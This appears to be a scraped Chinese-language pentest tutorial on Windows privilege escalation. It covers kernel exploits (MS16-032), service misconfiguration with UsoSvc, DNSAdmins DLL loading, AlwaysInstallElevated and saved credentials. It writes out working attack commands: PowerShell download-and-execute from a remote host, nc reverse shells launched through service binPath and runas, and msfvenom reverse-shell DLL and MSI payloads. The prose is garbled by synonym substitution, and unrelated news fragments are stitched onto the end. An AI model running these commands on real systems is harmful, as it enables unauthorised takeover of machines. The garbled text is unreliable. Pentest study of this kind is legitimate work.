本节首要针对Windows把持系统下的权限提拔进行介绍,提权是后渗透主要的一环节,在权限较低的情形下,站在冲击者的视角进行内部收集平安测试、系统平安测试、应用平安测试等方面会显现“束缚”,所测试出的质量与究竟也会分歧。本文基于Win把持系统下离别从内核破绽、权限设置、DLL注入、..表等方面睁开介绍,个中包含破绽自己的介绍、破绽复现过程等内容的显现。该提权内容的阅读没有前后顺序,可凭据读者自身所需进行全文阅读或某偏向内容的阅读。
[原创文章:www.ii77.com]
权限提拔意味着用户获得不许可他使用的权限。好比从一个通俗用户,经由“手段”让本身变为治理员用户,也能够懂得为行使把持系统或软件应用法式中的错误,设计缺陷或设置错误来获得对更高接见权限的行为。 [好文分享:www.ii77.com]
读取/写入敏感文件
从新启动之后权限维持
插入永远后门
1.内核破绽
2.错误的办事权限设置
3.DLL注入
4.始终以高权限安装法式
5.凭证存储
内核破绽行使法式是行使内核破绽来执行具有更高权限的随意代码的法式。成功的内核行使平日会以root号令提醒符的形式为冲击者供应对方针系统的超等用户接见权限。
接下来我们以MS16-032来做演示,
给人人介绍下搜检Windows提权辅助对象,wesng首要匡助检测Windows平安缺陷,是Windows Exploit Suggesters的升级版,经由读取加载systeminfo号令的究竟来输露马脚行使建议。
https://github.com/bitsadmin/wesng.git
1. 将wesng下载到内陆主机上,先升级最新的破绽数据库。
python wes.py —update
2. 将方针机械的systeminfo号令的究竟输出并留存,使用wesng进行搜检。
发现只安装3个补丁,能够查察输出究竟来找对应的破绽行使代码。
3.下载https://www.exploit-db.com/exploits/39719里面的破绽行使
使用powershell下载破绽行使代码并执行
Powershell IEX (New-Object Net.WebClient).DownloadString('http://X.X.X.X:8000/ms16-032.ps1');Invoke-MS16-032
Microsoft Windows 办事(即以前的 NT 办事)可以建立可长时间运行的可执行应用法式。这些办事能够在较量机启动时主动启动,能够暂停和从新启动并且不显露任何用户界面。这种办事非常适合在办事器上使用,或任何时候,为了不影响在统一台较量机上工作的其他用户,需要长时间运行功能时使用。还能够在分歧登录用户的特定用户帐户或默认较量机帐户的平安上下文中运行办事。Windows办事(Windows Services)平日使用内陆系统账户启动。若是我们拥有能够点窜办事设置权限的话,能够将办事启动的二进制文件替代成恶意的二进制文件,从新启动办事后执行恶意的二进制文件,能够获取到system权限。
1.首先需要在找到存在设置权限错误的办事,这里介绍人人使用powerup.ps1,
https://github.com/PowerShellMafia/PowerSploit/tree/master/Privesc
powerup是一个非常好用的windows提权辅助剧本,能够搜检各类办事滥用,dll劫持,启动项等,来列举系统上常见的提权体式。
接下来我们以CVE-2019-1322进行演示,Update Orchestrator办事的运行体式为NT AUTHORITY\SYSTEM,而且在Windows 10和Windows Server 2019上已默认启用。首先使用powershell加载powerup.ps1,需要在powerup.ps1结尾中到场InvokeAllchecks或许使用powershell执行时加载,执行如下代码:
Powershell -exec bypass IEX(new-object Net.webclient).downloadstring('http://192.168.25.31:8000/PowerUp.ps1'); InvokeAllchecks
发现USOSVC能够被点窜和重启。
2.接下来我们上传nc,此处能够换成cs或msf生成的随意可执行文件 ,此处有一个小坑,binPath=和路径中央有一个空格,点窜办事启动的可执行法式后,启动办事。
1)住手USOSVC 办事
PS C:\Windows\system32> sc stop UsoSvc
2)将办事执行的exe文件点窜为nc,反弹shell
PS C:\Windows\system32> sc config usosvc binPath= "C:\GitStack\gitphp\nc.exe 192.168.25.31 4455 -e cmd.exe"
3)将办事状况设置为主动启动
PS C:\Windows\system32> sc config usosvc start=auto
4)启动办事
PS C:\Windows\system32> sc start usosvc
安分守纪的执行
执行后,设置并开启办事
DLL注入提权是一种行使应用法式错误加载DLL的手艺。能够使用此手艺来实现提权以及持久掌握。
首先,让我们认识应用法式加载DLL的机制。
DLL代表动态链接库,它是一个库文件,个中包含可被多个应用法式同时动态接见和使用的代码和数据。DLL是Microsoft引入的,用于实现共享库的概念。
若是一个用户是DNSAdmins构成员,能够以治理员权限加载DLL,我们能够经由msfvenom来生成一个反弹shell的DLL文件获取治理员权限。
1. 首先查察我们的用户权限,我们的用户在DNSAdmin组里面
2. 使用msfvenom生成一个反弹shell。
Msfvenom -p windows/x64/shell_reverse_tcp LHOST=X.X.X.X LPORT=443 -f dll -o rev.dll
3. 在冲击者机械启动smb办事,经由UNC来读取冲击机上生成的DLL文件。
4. 在方针机械上挪用dnscmd来执行加载长途DLL文件,通俗用户执行dnscms或者会失败。
PS C:\Users\> dnscmd.exe /config /serverlevelplugindll \\X.X.X.X\s\rev.dll
Registry property serverlevelplugindll successfully reset.
Command completed successfully.
PS C:\Users\> sc.exe \\resolute stop dns
SERVICE_NAME: dns
TYPE : 10 WIN32_OWN_PROCESS
STATE : 3 STOP_PENDING
PAUSABLE, ACCEPTS_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x1
WAIT_HINT : 0x7530*
PS C:\Users\> sc.exe \\resolute start dns
SERVICE_NAME: dns
TYPE : 10 WIN32_OWN_PROCESS
STATE : 2 START_PENDING
NOT_PAUSABLE, IGNORES_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x7d0
PID : 2644
FLAGS :
5. 获取到system权限的shell
AlwaysInstallElevated是一项功能,可为Windows较量机上的所有效户(尤其是低特权用户)供应运行任何具有高权限的MSI文件的功能。MSI是基于Microsoft的安装法式软件包文件花样,用于安装,存储和删除法式。
经由组策略中的windows installer来进行设置,默认情形下该设置是封闭的。
1. 首先需要搜检较量机是否开启了该设置,也能够经由执行powerup.ps1来搜检权限。
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
2. 使用msfvenom生成一个msi文件用来反弹shell。
Msfvenom -p windows/meterpreter/reverse_tcp lhost=X.X.X.X lport=4567 -f msi > 1.msi
3. 安装msi,获取反弹shell。
msiexec /quiet /qn /i C:\Windows\Temp\1.msi
Windows7之后的把持系统供应了windows保险柜功能(Windows Vault),Window保险柜存储Windows能够主动登录用户的凭证,这意味着需要凭证才能接见资源(办事器或网站)的任何Windows应用法式都能够使用此凭证治理器和Windows Vault并使用供应的凭证取代用户一向输入用户名和暗码。
除非应用法式与凭证治理器进行交互,不然我认为它们弗成能对给定资源使用凭证。是以,若是您的应用法式要使用保司库,则应以某种体式与凭证治理器进行通信,并从默认存储保司库中恳求该资源的凭证。
1.经由cmdkey /list 列出存储的所有效户的凭证,发现administrator凭证被存储在了本机上。
2.使用runas来以治理员权限启动nc反弹shell
Runas /user:administrator /savecred "nc.exe -e cmd.exe X.X.X.X 1337"
3.在冲击机启动监听,获取反弹shell。
在测试项目中,测试人员平日会设法获取shell,然后再进行下一步的把持,本文旨在给人人供应一些从通俗权限到system权限的思路,根基总结如下:
1.**经由查察内核版本,寻找是否存在能够行使的提权EXP**。
2.经由信息收集,查察机械设置,账户暗码等查察是否能够行使。
3.**经由查察系统的应用,或许第三方应用,查找办事自己是否存在问题,或许是否设置存在问题,如人人常见的mysql**提权
出色介绍
这是4月13日在以色列特拉维夫拍摄的以色各国防部建筑。新华社本地时间14日,伊朗伊斯兰革命卫队针对其军事动作发布第二份声明。声明透露,因为
点击上方“CCTV4” 存眷我们!伊朗常驻结合国代表团称伊朗对以色列的袭击可被视为已“竣事”。本地时间4月14日,伊朗常驻结合国代表团在社交媒
今天暴风暴雨又囊括而来一大早 江西省景象台就接连发布四道预警大风黄色预警旌旗宜春、新余两市的部门区域将显现8-10级雷暴大风局地伴有强雷电
比来知名童星关凌在社交平台发布了一个视频激发好多网友热议关凌透露,只因为前一天晚上给两娃指点了作文和阅读懂得,究竟晚上睡觉之前就感
▲点击存眷麻涌镇当局“艳丽麻涌”官方微信可乐2.3元一瓶、矿泉水1.2元一瓶、爽性面0.9元一包……近年来,量贩零食店的显现,为“吃货”们打
点击蓝字存眷我们群众事 无小事黄龙溪镇以更贴心更高效的办事体式起劲做大好人民群众“贴心人”切实提拔群众的获得感、幸福感↓↓↓1深化办事
本地时间4月14日,伊朗伊斯兰革命卫队揭橥声明,为了回应以色列的罪过,个中包罗袭击伊朗驻叙利亚使馆领事处并导致多名军事人员灭亡,伊朗伊
比来知名童星关凌在社交平台发布了一个视频激发好多网友热议关凌透露,只因为前一天晚上给两娃指点了作文和阅读懂得,究竟晚上睡觉之前就感
本文内容来自网友供稿,如有信息侵犯了您的权益,请联系反馈核实
Copyright 2024.爱妻自媒体,让大家了解更多图文资讯!